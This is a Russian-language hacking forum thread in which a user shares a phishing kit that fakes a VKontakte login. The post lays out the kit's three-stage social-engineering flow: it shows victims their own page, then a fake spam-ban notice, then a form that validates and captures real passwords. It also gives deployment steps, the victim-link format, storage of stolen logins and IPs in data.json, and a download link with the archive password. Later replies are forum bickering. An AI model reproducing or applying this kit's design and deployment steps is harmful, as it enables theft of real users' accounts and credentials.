RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
/del
Последнее редактирование:
-
Что-бы увидеть скрытые разделы и познать все тайны форума, Вам необходимо Зарегистрироваться или Войти.
Скрипт фишинг вконтакте
- Автор темы RareHoneyB
- Дата начала
RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
Скинь док-ва
RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
Он под хайдом и там нет баззы. Он не работает. Я его дописовал. Можешь проверить)
Здравствуйте!
Сливаю фейк авторизацию ВК
Работа фейка разделена на три стадии :
Стадия I - жертва переходит по ссылке "взломщика" и видит свою страницу на 1.5 сек (было сделано исходя из гипотезы, что человек увидев "свое" подсознательно повысит уровень доверия). Через 1.5 сек происходит редирект на стадию II
Стадия II - жертва видит форму, со случайно созданным временем (время останется одно и то же, для последующих визитов), и стандартную форму ВК о блокировке страницы за рассылку спама (см. скриншот под спойлером). Фейк сам распарсит страницу жертвы по переданному в ссылке ID, заберет оттуда имя и аватарку
Стадия III - жертве предлагается ввести логин и пароль для подтверждения доступа (во избежание бана). Присутствует валидация - при неправильно введенном логине и пароле поля подсветятся красноватым (как в оригинальном ВК), пропустит только правильный логин/пароль. После ввода, жертва будет направлена на оригинальный контакт (и выдохнет с облегчением)
После того, как жертва поведется на фейк есть шанс что она побежит менять логин-пароль, поэтому форму можно легко переделать под смену пароля
Как использовать фейк :
Заливаем на хостинг, даем файлам необходимые права.
Жертве даем ссылку вида : yoursite.com/user.php?id={USER_ID}&to=validation, где вместо {USER_ID} - id'шник жертвы (только цифры! без приставки id и спецадресов типа durov)
Нужно заметить несколько пунктов :
- Свою страницу жертва видит через api скриншотера веб-страниц, при первом визите скриншотер может думать долго, поэтому лучше "прогреть кэш"- зайти сначала самому, и далее он будет работать мгновенно
- Для скриншотера нужен api key, менять его в файле user.php, строка 5 ($screenshot_key=), для удобства я приложил тестовый, в крайнем случае можно использовать его
-Фейк был частью системы фейков, поэтому админку не прикладываю. Логины-пароли-IP будут в файлике data.json, его лучше предварительно закрыть с помощью .htaccess
-Пользователь после успешной авторизации больше не сможет посетить фейк, устанавливается кука при наличии которой его будет сразу перенаправлять на vk.com/support
http://rgho.st/8LQHdVLdQ (не реклама)
Пасс на архив:111
RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
Модеры и народ , пишите @RareHoneyBadger
RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
По опыту скажу, не сменит
RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
Лол спс
RareHoneyB
Новичок
- Статус
- offline
- Регистрация
- 05.01.2018
- Сообщения
- 23
- Репутация
- 0
Обоснуй минус или напишу модеру
Fly
Резидент
- Статус
- offline
- Регистрация
- 11.05.2016
- Сообщения
- 176
- Репутация
- 189
Давай я попробую.
1. Ты пытаешься продать паблик.
2. При этом ты в этом не шаришь.
P.s. Я думал тебе для личного пользования. И я помог, как ты просил. Ещё IPLogger мне зачем-то кидал.
